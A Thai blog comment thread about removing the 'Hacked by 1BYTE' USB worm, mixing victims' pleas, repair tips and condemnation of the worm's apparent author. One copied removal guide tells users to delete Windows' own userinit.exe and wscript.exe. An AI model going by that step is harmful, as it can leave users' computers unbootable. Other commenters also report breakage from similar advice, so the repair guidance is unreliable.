ทำใน safe mode แล้ว แต่มันไม่ reset มันขึ้นหน้าต่าง dos ขึ้นมา

ต้องขอขอบคุณ  คุณไม่แสดงตน มากเลยนะครับ  หลังจากได้คอมเม้นท์ ผมก็ไปตรวจสอบดูปรากฎว่า ผมพิมพ์คำสั่งผิดไปอันนึง จาก - เป็น /  ผมจึงออกเวอร์ชั่น 2.06 มาเพื่อแก้ไข ส่วนนี้  และเพิ่มประสิทธิ์ภาพเข้าไปอีก ในส่วนของ ไม่ใช้ .reg ในการทำงานอีก  รันบน Dos อย่างเดียว ไม่ต้อง คลิก Yes No เหมือนเก่า   เอาไปทดสอบดูนะครับ  หากใช้การไม่ได้ก็เอาเวอร์ชั่นเก่าไปนะจ๊ะ  

Special Thanks

ขอบคุณมาก ๆ ที่ช่วยไม่ต้องล้างเครื่อง

ขอความช่วยเหลือด้วยค่ะ ลองทำการฆ่าไวรัสแล้ว

แต่มันก็กลับมาใหม่ค่ะ ต้องทำอย่างไรต่อค่ะ

ขอบคุณค่ะ

ก่อนอื่นผมขอบคุณมากที่ให้ตัวแก้มาผมจะใช้ให้เป็นประโยชมากที่สุดครับ และผมขอลบกวนอีกเรื่องครับคือตอนนี้มีไวรัสอีกตัวนึงเวลาเราเปิด IE ขึ้นมาตรงช่อง Address จะขึ้นว่า http:/// ซึ่งเวลาจะเข้าไปพิมพิ์ในช่อง Address จะพิมพ์ไม่ได้ช่วยผมหน่อยครับผู้รอบรู้ จะขอบพระคุณอย่างสูง (ผมจะคอยนะครับ)

ของผมโดนเจ้านี่จริงๆด้วยครับ ก่อนหัวกะโหลกจะขึ้น ไฟลหายไปต่อหน้าต่อตาจริงๆครับ แบบว่าเหมือนรีเฟรชแล้วหายไปทันทีเลย ตอนนี้มีปัญหาคือฟอร์แมทไม่ได้ครับ เพราะว่ามันไม่ยอมรันต่อ มันบุตอยู่แต่ในหน้าจอไบออสอย่างเดียวเลย(ที่ให้กดdel) ทำไงต่อดีเนี่ยเอาHDไปพวกกับเครื่องอื่นแล้วฟอร์แมตจะได้ป่าว

เหมือนมีเทวดามาโปรด เกือบแล้ว เกือบล้างเครื่อง

ขอบคุณหลายเด้อ

ขอบตอบคุณ nong  ก่อนเลยนะครับ

เอามาจากพันทิพย์ครับ

1. ก่อนอื่นต้องไปดาวน์โหลดไฟล์ SmitfraudFix มาก่อนครับ จากที่นี่
http://siri.urz.free.fr/Fix/SmitfraudFix.zip (ขนาดเล็กครับ 674 KB)
นำมาวางไว้ที่หน้า Desktop แล้วทำการแตกไฟล์ออก โดยการคลิ๊กขวาแล้ว Extrack Here

2. ดาวน์โหลดไฟล์ killbox.exe จากที่นี่
http://download.bleepingcomputer.com/spyware/KillBox.zip (ขนาดเล็กมากครับ 69 KB)
นำมาวางไว้ที่หน้า Desktop แล้วทำการแตกไฟล์ออก โดยการคลิ๊กขวาแล้ว Extrack Here

3. ทำการเปิดเรียกใช้งาน HijackThis ครับ ไปที่ Do a system scan only แล้วหาหัวข้อตามนี้นะครับ

F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\killVBS.vbs

ทำเครื่องหมายถูก หน้าหัวข้อดังกล่าว แล้วคลิ๊กที่ปุ่ม Fix Checked

4. ทำการเปิดเรียกใช้งาน Killbox ที่อยู่หน้า Desktop ครับ
-- คลิ๊กที่ "delete on reboot"
-- คลิ๊กที่ "all files"
-- สำเนาข้อความข้างล่างนี้ ทั้งหมด

C:\WINDOWS\system32\killVBS.vbs
C:\WINDOWS\system32\wscript.exe
C:\WINDOWS\system32\userinit.exe

ไปวางที่ช่อง Full Path of File to Delete แล้วคลิ๊กเครื่องหมายกากะบาดสีแดง เพื่อลบไฟล์ดังกล่าว

(เพิ่มเติมเอาไปใส่ที่ละตัวและลงทีละตัวค่ะ กดเครื่องหมายกากบาท แล้วมันจะขึ้นมานับถอยหลังให้เรากดที่ตัวนับถอยหลังนี้แล้วตอบ yes ค่ะ ทำครบสามตัวนะคะ)

5. Restart เครื่องแล้วเข้า safe mode (กดปุ่ม F8 ตอนบูต)

6. ดับเบิ้ลคลิ๊กเข้าไปในโฟลเดอร์ SmitfraudFix ที่อยู่หน้า Desktop
ดับเบิ้ลคลิ๊ก smitfraudfix.cmd และกดปุ่มอะไรก็ได้ผ่านเข้าสู่หน้าเมนู
เลือกหัวข้อที่ 2 - Clean โดยการพิมพ์ 2 แล้วกดปุ่ม Enter เพื่อลบไฟล์ที่ติดไวรัส
โปรแกรมจะทำการซ่อมโปรเซส และลบไฟล์ที่ติดไวรัส และถามเราถึงการ Clean Regitry ให้เราตอบ y แล้วกดปุ่ม Enter โปรแกรมจะทำการซ่อม
Regitry ให้ เมื่อเสร็จแล้วก็จะกลับสู่เมนูอีกครั้ง พิมพ์ q แล้วกดปุ่ม Enter เพื่ออกจากโปรแกรม

7. ทำการ Restart เครื่องครับ

ช่วย Scan แล้วโพส Logfile ให้ดูอีกทีนะครับ

ถ้าไม่มี hijack

hijackthis
http://www.majorgeeks.com/download3155.html

ตอบคุณ na นะครับ

ถ้าโปรแกรมที่ดาวโหลดตัวนี้ไปแก้ Work จริงๆละก็ เจ้า Worm ตัวนี้ก็จะหายหมดครับ

สาเหตุที่มันกลับมาอีก  เป็นไปได้ว่า ใน FlashDrive คุณหรือของคนอื่นมาใช้เครื่องคุณแล้ว เผลอ ดับเบิ้ลคลิกเข้าไปในไดรฟ์อีก  ก็ติดอีกครับ 

ช่วยตอบที !!

แล้วถ้าผมใช้ windows xp หล่ะ จะทำยังไงเข้า save mode ไม่ได้

ตอบคุณชัย ครับ

การเข้า SafeMode ใน WinXP ให้Restartเครื่อง ครับ  แล้วกด F8  แล้วจะขึ้นเมนู สีดำๆ ตัวอักษรขาวๆ

ให้เลื่อนไปเลือก Safe Mode แล้ว Enter เลยครับ หรือลองอ่านบทความตรงนี้ดูครับ

โปรแกรมนี้ใช้งานยังไง ?

• ต้อง Run บน SafeMode ครับ เพราะ ผมยังไม่ได้ฝังไว้ใน Registry เลยก่อนเริ่มระบบครับ   การเข้า SafeMode  ให้ Restart เครื่อง  แล้วกด F8 ย้ำๆ   จนคีย์บอร์ดพัง จึงจะเข้าได้  (ล้อเล่ง)  บางเครื่อง กด F8 แล้ว เป็นการเข้า Boot Menu ก็ให้เลือก Boot จาก harddisk ก่อนแล้ว แล้วกด F8 ย้ำๆอีกครั้ง จากนั้นจะขึ้นหน้าต่าง ดำๆขาวๆ ให้เลือก safemode ครับ อยุ่บนสุดเลย จากนั้นมันก็จะขึ้น ข้อความที่เราอ่านไม่รู้เรื่อง.ยาวๆ  ให้รอครับ รอสักพัก ก็จะมีลูกศร cursor ขึ้นมา มี Pop up เกี่ยวกับ System Restore  ให้ตอบ yes ครับ

ขอบคุณมากครับที่ช่วยตอบ

ผมมีข้อสงสัยอีกอย่าง คือว่าอยากรู้ว่าโปรแกรมป้องกันไวรัส โปรแกรมไหนดีที่สุดตอนนี้ครับ แล้ว com เราต้องลงโปรแกรมกันไวรัสสักกี่โปรแกรมถึงจะปลอดภัยครับ

ขอความช่วยเหลือครับ

คือผมติดไวรัส Hack by 1BYTE

(แต่ไม่มีคำว่า Novirus No work No Money)

ผมลองโหลดโปรแกรมกำจัดไป ทั้ง 2 เวอร์ชั่นแล้ว แต่ก็แก้ไม่ได้มันขึ้นว่า

version 2.05

C:\ 1BYTE~1.EXE

The NTVDM CPU has encountered an illegal instruction.

CS:0546 IP:0105 OP:63 3a 30 78 30 Choose'Close'to terminate the application

 ส่วนversion 2.06

ขึ้นที่หน้า dos ว่า Cannot load VDM IPX/SPX support

***** รบกวนช่วยเหลือผมด่วนนะครับเพราะ เครื่องที่ใช้อยู่มีข้อมูลสำคัญทั้งนั้น ไม่อยากล้างเครื่องครับ ขอบคุณครับ

คุณ Kook ครับ 

Hack by 1 byte ตัวนี้เลยครับ

http://gotoknow.org/blog/president/86034

คุณ กรำ

ส่วน ถ้าเครื่องที่โดนหัวกะโหลกไปแล้ว  ตอนนี้ผมยังไม่ทราบวิธีเหมือนกัน เลย ครับ เพราะไม่เคยโดนด้วยตัวเอง   คงต้องทดสอบแล้วแหละ

ถ้ายังไงลอง จัมป์ Harddisk กับเครื่องอื่นดูนะครับ ถ้ามีข้อมูล ก็ Backup ดูเลย   ยังไงก็ลองแบบนี้ไปก่อนนะครับ

ผมก็โดนเหมือนกัน ผมรู้จักชื่อคนเขียนมันขึ้นมาด้วย

ผมโดนไปแล้ว1 ครั้งนะครับ แล้ว ลงวินใหม่ - - มีวิธีแก้ปะ

ตอบ ของคุณ Bios  ครับ

ผมได้ดูรูปที่ให้ Link มาแล้ว  จากภาพ Windows บอกว่า  ไฟล์ที่ดาวโหลดมา อาจจะเกิดความเสียหาย หรือไม่รู้จัก ( unknow format  or dammaged )

ให้คุณลองดาวโหลดใหม่ดูอีกทีนะครับ 

สำหรับถ้าคุณลง Windows ใหม่แล้ว  และลงได้แล้ว ตัว Worm ก็จะหายไป จาก Drive C  หากข้อมูลคุณยังมีอยู่ใน Drive D  ให้คุณเข้าไปลบไฟล์  autorun.inf กับ winlogon.exe ทิ้งเลยครับ อย่าเผลอดับเบิ้ลคลิกที่ไดรฟ์   หรือ เปิดไฟล์นี้ขึ้นมาครับ แต่ไฟล์ 2 ไฟล์นี้ซ่อนอยู่  

ให้ใช้เครื่องมือนี้ครับเพื่อทำให้มองเห็น

http://gotoknow.org/blog/president/87671

โดนเหมือนกันค่ะ แต่ ไตเติ้ลบาร์ ขึ้นว่า "hack by F16"  จะแก้ไขยังไงคะ รบกวนด้วยค่า

ถ้าเครื่อง Restart แบบนี้  บ่อยๆ   แสดงว่าระบบไฟล์มีปัญหาแล้วครับ  

วิธีแก้ ผมว่า ลองใช้ แผ่น Windows มาซ่อมแซมไฟล์ที่เสียหาย

ทำแบบนี้นะครับคือ  ใส่แผ่นบูต windows เข้าไป

ตอนขึ้นหน้า  แสดงไดรฟ์ใน Harddisk  ไม่ต้องลบ พาติชั่น ให้ Enter ตรงไดรฟ์  C ไปเลย    แล้วมันก็ทำการ ติดตั้งใหม่ แต่ข้อมูลยังเหมือนเดิมครับ

ปล. อย่าเรียกผมว่า ท่านเลย  ไม่ชอบให้เรียกเลยครับ พูดจริงๆ   ผมคนนักเลงครับ พูดแบบกันเอง หรอยๆ  แนวๆ ดีกว่า แฮะๆ  อีกอย่าง ผมก็คนธรรมดา ไม่ได้เก่งกาจไม่ได้ดีเลิศ ไปกว่าใคร 

ช่วยด้วยครับ ผมโดนไปเต็มๆๆอ่านช้าไปนิดนึงครับ ไม่เห็นหัวกระโหลก มาอีกทีจอกระพริบๆๆ พอรีสตาร์ใหม่ก็ไม่เข้าวินโดว์ สรุปว่าพัง ฮาร์ดดิสC เข้าไม่ได้  ที่สำคัญไดร์D เก็บงานสำคัญไว้ พอไปจัมพ์ขอมูลหายหมดเลยครับช่วยผมทีครับ อยากจะตายงานผมทั้งหมดที่ทำมา3ปี หายหมดเลย ผมโดนเจ้านายฆ่าแน่ๆๆเลย ไม่ทราบว่าไฟล์ที่หายไปผมผมกู้ได้ไหมใครรู้ช่วยบอกหน่อย

ใครติด Hack by 1 Byte ไปที่นี่เลยครับ

http://gotoknow.org/blog/president/86034

สำหรับคุณ tt ครับ

พูดจริงๆนะครับผมก็งงครับว่าทำไมของคุณมันเปิดไม่ได้ ผมแปลกใจมาก  หรือไม่อาจเป็นที่ OS รึเปล่าไม่แน่ใจ   ถ้าเป็น Win XP  น่าจะใช้ได้นะครับ

ขออภัยทุกท่านด้วยจริงๆครับ หากใช้งานไม่ได้  ผมทำได้เท่าไหร่ ก็ทำเท่านั้นเลยครับ  สุดฝีมือ แล้ว จริงๆ  หากใครที่ข้อมูลหายแล้ว   เดี๋ยวผมกำลังจะศึกษาครับ  พึ่งได้ Harddisk ที่โดนหัวกะโหลก มา  จะได้ช่วยๆกันครับ   หวังว่าคงเป็นประโยชน์สำหรับทุกท่าน ครับ 

ขอบคุณมากๆ แต่ยังมีปัญหาต่ออ่ะค่ะ แก้ได้หนึ่งเครื่อง เพิ่งติดมาจาก thumb drive ไม่ทันข้ามคืนดี แต่อีกเครื่องท่าทางจะติดมาหลายวันแล้ว อาการยังไม่ถึงหัวกระโหลก แค่ถามหา cd windows ตลอด เครื่องเข้า safe mode ธรรมดาไม่ได้ ลองรันfixtool กับ safe mode with networking แล้ว สามารถเรียก Task Manager ได้ แต่ที่ IE ยังเขียนว่า Hacked by 1 byte(No Virus....) อยู่ ทำไงดีค้า ปวดหัวจิงๆ

อีกคำถามค่ะ จะกำจัดเจ้า virus นี้จาก thumbdrive ยังไง ตอนนี้ไม่กล้าใช้มันแย้ว format เฉยๆพอมั้ย

ขอบคุณค่ะ

ขอบคุณนะคะ ได้ใช้โปแกรมลบไปแล้วสำเร็จได้หนึ่งเครื่องคะ

แต่อีกเครื่องมีปัญหาคือ เข้า safe mode แล้ว เข้าโปรแกรมที่โหลดมาแล้ว รันแล้ว แต่ มันทำไม่เสร็จอะคะ แล้วก็ไม่มีอะไรเกิดขึ้น เครื่องไม่ reset อะคะ

 ทำยังไงดี ???

ตอบหน่อยนะคะ

ผมโดนแล้วขึ้นรูปหัวกระโหลกเลยครับ folder หาย งานหาย พังหมดเลยครับ อันตรายมากๆ ผมนึกว่า

วินโด้พัง

เจอกับเครื่อองตัวเองเลยเมื่อวันที่ 6เมย  เพราะความใจบุญแท้ๆๆเลย เลยสแกนด้วย McAfee ทำไรไม่ได้ ทำเอาMcAfeeเดี้ยงตามไปด้วย ดีที่ไม่ต้องสูญเสียข้อมูลไป จนตอนนี้ใช้งานได้แต่ในโปรแกรมระบบLANยังใช้ไม่ได้เหมือนเครื่องอื่นๆเลย เป็นงง อ้อที่ map drive ไว้มันก็ตามไปจองล้างจองผลาญด้วยค่ะ นี่คาดว่าจะต้องตามแก้หลายเครื่องกระมังคะ ที่ใช้ระบบLAN ทะยอยเจอบ้างแล้ว แต่อาการยังไม่ถึงเห็นหัวกระโหลก   

ขอวิธีแก้ใน Thumb Drive ด้วยนะคะ ทั้งๆที่ยกเลิก AUTORUN ในเครื่องคอมแล้ว

อยากทราบอาการของคนที่ติดระยะสุดท้าย ที่ว่าข้อมูลหาย หายเฉพาะdrive  C หรือว่า drive อื่นๆก็หายด้วยครับ เอาไว้เป็นแนวทางในการแก้ไขต่อไปครับ ใครก็ได้ ช่วยบอกวิธียกเลิก AutoRun ทั้ง Domain ว่าทำได้ไหมหรือไปทำที่ตรงไหน ช่วยด้วยนะครับ ของคุณครับ

ขอบคุณมากๆเลยนะคะที่ช่วยได้ทันเวลา ข้อมูลยังไม่หาย แต่เครื่องClient เริ่มจะโดนบ้างแล้วเพราะMap Drive กับเครื่องServer ไว้ แต่ดีที่ทำ Image ไว้ เครื่องไหนโดนก็ใช้ผีเข้าช่วยเลยค่ะ

เสียใจมาก  เจอกับเครื่องตัวเองเลยเมื่อวันที่ 9 เมย  ตอนห้าโมงเย็น  ตอนนั้นพิมพ์งานอยู่  กะว่าจะเปิดโปรแกรมเวิดด์ขึ้นมาอ่านคู่กัน เครื่องบอกว่าโปรแกรมเวิดด์ไม่สมบูรณ์ให้ติดตั้งใหม่ เรากด ok สักพักเครื่องแฮงค์ สลับกับ กระโหลกไขว้ กระพริบปิ้บๆ พอรีสตาทร์เครื่อง เข้าวินโดว์ไม่ได้ เครื่องรันไบออส วนซ้ำอยู่ตลอด เอาฮาร์ดดิสข้อมูลเชคดูปรากฏว่า ข้อมูลสำคัญๆหายหมดเลย (เกลี้ยงกรึบ)  งานวิทยานิพนธ์สำคัญ ไม่เหลือให้เห็นสักนิดเดียว เอาฮาร์ดดิสไปกู้ก็ได้มานิดหน่อย ใช่ว่าที่กู้มาจะเปิดได้ เปิดแล้วไฟล์เสียเสียหาย หมดเลย สรุป ต้องนั่งพิมพ์ใหม่อีก  ก่อนหน้านี้ สังเกตเห็น Hacked by  1byte ตอนเข้าเนตแล้วแต่ไม่ได้เอะใจว่าเครื่องไม่เป็นไร ส่วนอาการที่โดนเหมือนกับที่เขาเล่ามาข้างบนนั่นแหละ เช่น เข้า tark managerไม่ได้ เข้าไปรัน regidit ไม่ได้ แถมยังขึ้น Hacked by  1byte {no virus no work no money} อ่านแล้วช้ำใจ พอโดนเองกับเลยกลัวมากๆ  วิธีแก้(ที่ผมใช้ จะลองเอาไปใช้ดูไม่ว่าคับ ) โหลดโปรแกรมมากำจัดก่อน เข้าไปที่นี่คับ http://netserv.cc.psu.ac.th/home2/index.php?option=com_content&task=view&id=119&Itemid=50

จากนั้น

แล้วตามด้วยลงโปรแกรม bitdefencder  ตรวจจับอีกทีนึง รับรองว่า เครื่องสามารถใช้งานได่ปกติคับ

คติเตือนใจ : จงนำความผิดพลาดของผู้อื่นมาเป็นประสบการณ์แล้วคุณจะปลอดภัยจากไวรัส

ข้อมูล 500 กิก 3 ลูก เกลี้ยงเมื่อ 9 เม.ย

ขอบคุณที่บอกวิธีให้ครับ

คุณ  ตัวแก้

ไม่ทราบว่าความคิดเห็นด้านบน เป็นคนทำตัวจริงหรือเปล่า  ถ้าใช่  คุณจะร้บผิดชอบกับความเสียหายที่เกิดขึ้นอย่างไร  คุณบอกว่าปล่อยผิดตัว   แล้วคุณจะทำมันขึ้นมาเพื่ออะไร   แล้วความจริงตัวนี้คุณจะปล่อยให้ใคร   คุณแค้นเค้ามากนักเหรอ  ถึงได้ทำกับเค้าขนาดนี้   เราว่าคุณก็รู้ว่า ถ้าคุณปล่อย  ไป  แล้วมันสามารถแพร่เชื้อออก ไปยังเครื่องอื่นๆได้   และคุณคงจะปล่อยแฝงไปกับไฟล์บน Internet ด้วย    นั่นไม่ใช่คำแก้ตัวที่ดีเลย      และ อีกอย่าง  ข้อมูลที่คุณได้ทำลายไป  คุณรู้มั๊ย  ว่ามันสำคัญกับคนบางคนแค่ไหน     นึกถึงข้อมูลของคุณเองสิ  คุณเก็บอะไรสำคัญไว้บ้าง   แล้วว้นนึง มันเกิดหายไป ไม่เหลืออะไรไว้เลย  

คุณเก่ง เรายอมรับ   แต่ความเก่งของคุณน่าจะใช้ในทางที่ถูกต้อง  ทำแบบนี้น่าจะเข้าคุก  ข้อมูลอาจารย์ วางแผนการเรียนการสอน นับ ปี   หายหมด    ข้อมูลข้อสอบ  ก็หายหมด   รูปภาพความประทับใจที่เก็บไว้ตั้งแต่ลูกยังเล็ก   วิทยานิพนธ์เล่มหนาๆ   งานโปรเจคส่ง    งานนี้  สมควร

แต่คุณจะเป็นคนเก่งจริง ไม่ได้ หาก คุณไร้จริยธรรม

เชื่อว่าความเก่งของคุณ คงจะพิสูจน์ได้ ในคราวนี้ 

นี่ถ้ามีคนไม่รู้ว่า  คนทำคือใคร   แล้วคุณจะมาขอโทษแบบนี้มั๊ย      

เราขอประนามคุณ  ถ้าคุณยังชอบที่จะทำแบบนี้ ขออย่าได้เจอกันอีกเลย

เรายอมรับในคำขอโทษ แต่จะยกโทษให้คุณก็ต่อเมื่อคุณเอาข้อมูลที่คุณได้ลบไป  กลับมา  

ขอให้โชคดีกับสิ่งที่คุณทำ

ผมในฐานะ 

ผู้ดูแล blog นี้ 

ขอพูดกับผู้ทำเจ้า  Worm ตัวนี้ขึ้นมาครับ
เรื่องความเสียหายที่คุณทำไปมันมากเหลือเกินครับ  แต่ผมจะขอไม่พูดเรื่องนี้ละกัน ให้คนที่โดนพูดดีกว่า ครับ( เดี๋ยวว่าผมยุ่งอีก ) ว่ามันเป็นอย่างไรบ้าง  ผมขอพูดสั้นๆละกัน

1. คุณคงจะรู้ว่า คุณได้สั่งให้ Worm ไปทำอะไรตรงไหนบ้าง (ตัวผมเองไม่รู้หรอก ว่าคุณทำอะไร เพียงแต่ผมเข้าไปสำรวจดู  ผมเชื่อว่าที่ผมทำตัวแก้นี้ขึ้นมา   ยังกำจัดไม่หมด แน่)  คุณช่วยอธิบายได้ไหม ว่าคุณทำอะไรไปบ้าง....
2. คุณช่วยทำตัวแก้ worm ของคุณเองได้มั๊ย   เพราะที่ผมทำ  บางเครื่องยังคงมีปัญหา (อ่านจาก คคห.)  เพราะคุณก็เข้าไปแก้โค๊ดของคุณได้  คุณสั่งให้ทำอะไร  คุณก็สั่งกลับเป็นอีกอย่างนึง    เช่น ถ้าคุณสั่งให้ ฝังตัว key ใน Registry  คุณก็แก้โค๊ด ให้ลบ Key ตัวนั้นทิ้ง เป็นต้น
3. สำหรับเครื่องที่โดนลบข้อมูลแล้ว  คุณช่วยเอากลับมาได้ไหม      เพราะคุณต้องรับผิดชอบในการกระทำของคุณครับ  คุณลบเองได้ ก็ต้องเอากลับมาเอง ได้ ผมเชื่อว่าคุณมีความสามารถ

อยากจะพูดอย่างที่ผู้ดูแล blog บอก... แต่มัน... พูดไม่ออกค่ะ

อยากจะบอกคุณที่ทำเจ้าไวรัสตัวนี้มาว่า เป็นโอกาสดีแล้วที่คุณจะได้ใช้ความเก่งของคุณในทางที่ถูกที่ควรซะที  ยังมีคนอีกจำนวนมาก ที่มีของที่เขารักมากในคอม ที่กำลังจะเป็นเหยื่อรายต่อไป

คุณช่วยคนเหล่านั้นเถอะ 

เห็น web นี้ช้าไป HDD umla ไปซะแล้ว T_T ข้อมูลฉัน รูปภาพงาน Project หายหมด แม่เจ้า

นายตัวแก้  ขอชมนายที่นายแน่มากที่ออกมายอมรับแต่นายรู้ไหมว่านายทำไรลงไปนายแค่ทำเล่นๆแต่การเล่นของนายได้สร้างความเสียหายอย่างใหญ่หลวงให้คนอื่น นายจะรู้ไหมว่าไม่ใช่แค่ข้อมูลสำคัญที่หายไปคุณลองคิดดูว่าเครื่องคอมที่อยู่ในโรงพยาบาลหรือองค์กรอื่นที่ใช้ระบบLANถูกไวรัสของนายเล่นงานมันจะเป็นยังไง อาจจะบอกได้ว่านายอาจฆ่าคนบางคนโดยไม่รู้ตัวเลยก็ว่าได้เพราะจากความเดือนร้อนที่มาจากเจ้าไวรัสของนายนี่แหละ รู้ไว้ซะ นี่มันอาชญากรรมชัดๆๆ นายมันมีแค่มีปัญญาแต่ไร้สติ คิดแค่สนุก จนรู้เท่าไม่ถึงการณ์ สร้างความเดือนร้อนให้ผู้อื่น บาปนี้จะติดตัวนายตลอดไป... เสียใจ เสียดาย เจ็บใจ เป็นยังไงนายไม่เจอกับตัวเอง..คงยังไม่รู้หรอก..ขอให้นายได้รู้ในเร็ววันนะ...โชคดี

ขอความช่วยเหลือด้วยนะคะ ไม่รู้จะเรื่องเดียวกันรึป่าว แต่ยังไงก้ช่วยตอบหน่อยนะคะ คือตอนแรกเปิดเครื่องมา มันก้ขึ้นว่า can not find script file "C:windowssystem32killVBS.vbs" ก้เลยเอาคำว่า killvbs.vbs ไปลองเสิชดูในกูเกิ้ล เผื่อจะมีทางแก้อะไร และก้ได้ไปเจอกับเวบนี้ http://www.comlism.net/index.php?option=com_mamboboard&func=view&id=786&catid=17

ก็เลยลองทำตามคำแนะนำที่เขาพิมไว้ดู และก้รีสตาตตามที่เขาได้บอกไว้ พอจะเปิดเครื่องอีกที. มันเปิดไม่ได้แล้วอ่ะค่ะ พอเปิดเห็นตงdestop มันก็เด้งกลับไปตรงที่เขียนว่า logging off กับ saving your personal setting ออยู่แบบนั้นเลยจะลองเข้าเซฟโหมดดู พอเข้าเซฟโหมด มันก้ต้องรอนานมากๆ ..นานกว่าปกติ พอผ่านไปสักพัก มันก็ขึ้น ขึ้นเป็นประมานว่า saving your presonal setting  ที่เปนหน้าจอฟ้าๆ และก็กระพริบๆ อยู่อย่างนั้น ตอนนี้ก็ยังใช้งานไม่ได้ อยากรู้ว่าปัญหามันเกิดจากอะไร และก็จะแก้ไขได้ยังไงคะ

 ช่วยหน่อยนะคะ..

ตอบคุณพลอย ครับ

เท่าที่ผมดูจากลิ้งค์ เป็นการแก้ไข Registry ของระบบ โดยลบทั้งหมด ใน Winlogon  เหลือเฉพาะตัว C:windowssystem32killVBS.vbs 

ซึ่งอันที่จริง ผมว่าน่าจะไม่ควรลบตัวอื่น แต่ให้ลบตัวนี้     มากกว่า  ผมว่าเค้าเขียนแปลกๆนะครับ

แล้วเล่นลบไปแบบนี้ กู้ลำบากแน่ครับ  เข้า Win ก็ไม่ได้ เข้า safeMode ก็ไม่ได้    ลองซ่อมวินโดวส์ดูครับ  โดยใช้แผ่นติดตั้ง นี่แหละ แล้วบูตจาก CD WIndoows  แล้ว ENter ที่ไดรฟ์ C ไปเลย  ไม่ต้องลบ พาร์ติชั่น แบบนี้ ผมว่าได้ชัวร์ครับ   (ข้อมูลก็ยังอยู่ ) ยังไง บอกผลมาด้วยนะครับ ผมรอดูคุณพลอยอยู่ครับ  อยากช่วยเหลือจริงๆ  ผมชอบคุณชื่อพลอยด้วย อิอิ(ไม่ค่อยเกี่ยวกันเลย ง๊าก..)

เข้า safe mode with command prompt ก็ไม่ได้อ่ะค่ะ .. แบบรอนานมาก เหมือนจะมา แต่ก็ค้างอยู่แบบนั้น - -" และมันเกิดจากอะไรอ่าคะ ? ไอ่ปันหานี้อ่า ~

 แบบ.. บางทีก้เข้าได้นะคะ แต่มันก้เปนหน้าจอสีฟ้าๆ และก้กะพิบๆ ไปๆมาๆ ระหว่าง loading ur per ก่ะ saving ur per ซึ่งทำอะไรไม่ได้เลย -*-

ยังงียก็ขอบคุนสำหรับคำตอบนะคะ ..

ตอบคุณพลอย นะครับ

ถ้าเข้า Command ไม่ได้ก้อต้องทำตามที่บอกไว้ละครับ คือ ลง Windows แบบ ซ่อมแซม

ปัญหานี้เกิดจาก Registry ในการเข้าสู่ระบบ โดนลบ  Registry นี้สำคัญมาก   โดนลบไป  เพราะคำแนะนำผิดๆ  หรือสื่อสารกันผิดแน่ๆ  คุณพลอย ตามตัวได้เลยครับ  ผิดแน่ๆ    ความจริงน่าจะลบ C:windowssystem32killVBS.vbs   ไม่ใช่ตัวอื่นแน่  เพราะผมเข้าไปดูแล้ว คุณคงได้รับคำแนะนำให้ลบไปหลายคีย์เลย  และสำคัญหมดทุกตัวเลย 

ยินดีให้ความช่วยเหลือครับ..

ตอบคุณ  กจ  ครับ

   โปรแกรมนี้ Support ... Windows NT หรือมากกว่า เท่านั้นนะครับ ผมไม่แน่ใจ เหมือนกันว่าบางเครื่องมีปัญหาหรือเปล่า  แต่ที่ผมทดสอบมา Win XP ใช้ได้ครับ      ส่วน WinME  หรือ 98 95 ใช้ไม่ได้แน่ครับ เพราะ Dos คนละเวอร์ชั่นกัน  การแก้ไขมันเยอะมากครับ อย่างที่เขียนไว้ในบทความ ลงใหม่ง่ายกว่าจริงๆครับ    ข้อมูลที่สำคัญๆ ก็ Backup ไว้ก่อน ครับ  

ตอบคุณ toobo18 ครับ

     ถ้าโดนหัวกะโหลกอย่างนี้แล้ว หาโปรแกรม Rocovery ดีๆสักตัว มาแก้ครับ  เพราะ เจ้า Worm ตัวนี้ ไปลบข้อมูลทิ้ง หมดเลยจริงๆครับ ลำบากจริงๆครับ

ขอบคุณมากๆนะคะ  ช่างใจดีเหลือเกิน  ....

ทำไมถึงก้ข้อมูลเก่าไม่ได้หละคะ  เสียดายจิงๆ

ขอบคุณมากๆเลยค่ะ T____T

จะมาเล่าอาการของเครื่องเราให้ฟัง

Laptop ที่ใช้ติดเจ้าไวรัสโรคจิตนี้มาผ่าน thumb drive ที่ไปจิ้มมาจากเครื่องที่ทำงาน แต่ทีแรกก็ไม่ได้ตกใจอะไร เพราะเครื่อง Desktopที่บ้านก็เคยติดแล้วก็ได้โปรแกรมแก้จากที่นี่ไปใช้จนหายดี ก็ยังรู้สึกว่า แก้ได้ๆๆๆ

แต่ปรากฏว่า มันลงโปรแกรมไม่สำเร็จน่ะค่ะ เครื่องที่บ้านพอลงตัวแก้ไป มันก็จะอ่านๆๆๆๆ แล้วก็รีสตาร์ทเครื่องให้ใหม่เรียบร้อย ไวรัสหายไป แต่ Laptop มันไม่เป็นอย่างนั้น ไม่รีสตาร์ทด้วย ก็เลย... เอ๋ (เกาหัว) เลยลองไปแก้ที่เครื่องของที่ทำงาน มันก็เหมือนกัน อาการเดียวกัน คือโปรแกรมทำงานไม่เต็มที่ แล้วเครื่องก็ไม่รีสตาร์ท (ใช้ WIN XP ทั้ง 2 ค่ะ)  ในที่สุดก็เลย หาทางออกที่ดีที่สุดคือ นั่งแบตอัพข้อมูล บางส่วนที่ยังไม่ได้ใส่ซีดีก็ย้ายไปเก็บไว้ใน D ก่อน

 อาการติด Hacked by .. นี้เป็นอยู่ประมาณ 3 วันค่ะ ระหว่างนั้นก็ยังพอเปิดเครื่องทำงานกับอพยพข้อมูลหนีภัยไปได้เรื่อยๆ เพราะคิดว่าต้องล้างเครื่องแน่ๆ ไม่แน่ใจว่าของคนอื่นจะเป็นอย่างไร แต่เครื่องเรามันไม่ขึ้นกระโหลกไขว้ทันทีทันควัน มีการยืดเวลาตายให้หน่อย

 จนประมาณ 3 วันผ่านไป เปิดเครื่องมากะว่าจะลองใช้โปรแกรมแก้อีกรอบ คราวนี้มาเลยค่ะ อยู่ๆ ไอค่อนต่างๆที่อยู่บนหน้าจอก็วูบหาย เพิ่งจะเห็นกะตาตัวเองก็คราวนี้ไอ้ที่เขาเรียกๆกันว่า หายไปกะตา หรือ หายไปในพริบตา มันเป็นอย่างไร  ใจหายวาบ สิ่งแรกที่ทำคือลองคลิกไดรฟ์ D เช็คว่าที่โกยๆไปเก็บเหมือนห้องเก็ยของนั้นอยู่บ้างหรือเปล่า

สิ่งที่เห็นก็คือ 0 byte .... ล้มทั้งยืน

แถมหน้าจอยังขึ้นกระโหลกไขว้กระพริบปิ๊บๆๆๆๆ และแล้ว ก็ทำอะไรไม่ได้อีกเลย

